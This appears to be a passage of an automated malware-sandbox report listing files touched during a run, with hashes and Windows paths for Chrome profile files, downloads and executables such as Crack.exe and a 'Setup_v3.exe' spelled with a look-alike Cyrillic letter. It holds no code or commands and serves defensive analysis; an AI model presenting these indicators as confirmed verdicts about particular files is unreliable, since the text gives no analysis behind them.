SHA512 536ce2b713596e5af4fc9cbc9414c63d8979dd58ea87da59e7d5133779e6c7be8a7e69554ffe51e0294f8019e84537ba243770819a4594ca8d3d39d5ecc7e853

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 3f4eb0200e4c07766a5f923054c9749f
SHA1 ebf0d5146af2f26af61df4363110a9de9a0442cd
SHA256 8e87b1ab8bf9e7dc09cfd725563abb77c4404e367eb791ca42d051b1777f13c3
SHA512 c9240bde8d767b3dc599e9dc5c4b970f80fe8acb7f2a5d298ff01e63a546b978f4d89f3ab40130b2b8adcc7cf9750befec6c735937881d694f8d1469c64c819d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 2a8691460c80d3d4908041ce60fe6a75
SHA1 75160330ae719c1abb512bb50c823d39bb07a5ee
SHA256 3ded5e02e4a6a425e44623bd42e5b19f7f199923e7844fc2c5acd246154a999a
SHA512 03723c0fef72de47b9deb8b97c7a4f96e364b30e2b5892d76e39e9e07f18e64ce85def6228cbeeea256e8e512b9b3e62b7ac581ce9e39434151763a9aae27ec4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 f6bf361eb1ecea7cc6d36512cd4817c7
SHA1 05313a907ad207ffd86a929cf8aaa65fb6cc4064
SHA256 608f1c6dc36b10d4cd6b8f4d5a4316a6f830e1a984bedc5b671b517b2efe3bbc
SHA512 740be74d8f4105abce09de410318f87bf5ddf39947c8d483835336a65a59afa82e7f22c6a831b55b8262d59c0a861a835464c1ef63cf450d14e0eb9c03fb6f43

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 c3d6085f8d011163b6a47f389e208f6f
SHA1 ff1bd7b3d3c28978ab2be90a8314037fb2fbfb69
SHA256 5bd0f7bdcbca5804baad9308339fc943fbbc772f2c1f401e791e32eaccf5c5ca
SHA512 c9e9a2741b242b847b9e9b5ff0c630a2bfc2292bec5b26b8bc51dbe258dfea77c03913c65d316c30ce0784e0ae78638c83612a5c2abe0ce26b1df058c6af1bc9

C:\Users\Admin\Downloads\Unconfirmed 31418.crdownload

MD5 48deabfacb5c8e88b81c7165ed4e3b0b
SHA1 de3dab0e9258f9ff3c93ab6738818c6ec399e6a4
SHA256 ff309d1430fc97fccaa9cb82ddf3d23ce9afdf62dcf8c69512de40820df15e24
SHA512 d1d30f6267349bb23334f72376fe3384ac14d202bc8e12c16773231f5f4a3f02b76563f05b11d89d5ef6c05d4acaacc79f72f1d617ee6d1b6eddab2b866426af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

C:\Users\Admin\AppData\Local\Temp\7zO0DC74C63\Crack.exe

C:\Users\Admin\AppData\Local\Temp\7zO0DC83053\Sеtup_v3.exe

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\Downloads\Unconfirmed 130762.crdownload

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\8704ffe1-ecdb-4eed-927f-013931a4f798.tmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\Downloads\IconDance.exe

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\Downloads\DesktopPuzzle.exe

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
